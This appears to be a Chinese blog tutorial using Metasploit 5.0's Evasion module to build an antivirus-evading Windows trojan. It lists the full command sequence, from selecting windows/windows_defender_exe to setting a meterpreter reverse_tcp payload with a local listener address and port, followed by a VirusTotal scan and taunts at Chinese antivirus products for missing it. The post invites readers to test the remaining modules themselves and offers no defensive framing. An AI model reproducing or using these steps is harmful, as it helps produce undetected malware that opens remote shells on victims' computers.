5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试
首先我们启动msfconsole

service postgresql start
msfconsole

查看evasion模块

show evasion

显示模块
使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

详细信息
就一个文件名参数可以配置

set FILENAME bbskali.exe

生成shell

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.93
set LPORT 4444
exploit

生成shell
注意生成的目录

免杀测试

https://www.virustotal.com/
效果如下:
免杀效果
电脑管家
牛叉的电脑管家 垃圾~
这里仅仅对其中的一个模块进行了测试,感觉效果还是可以。毕竟是msf自带的模块。后面的模块,你们自行测试吧!
360安全装逼

Last modification:January 11th, 2020 at 07:37 pm
正在沿街乞讨中……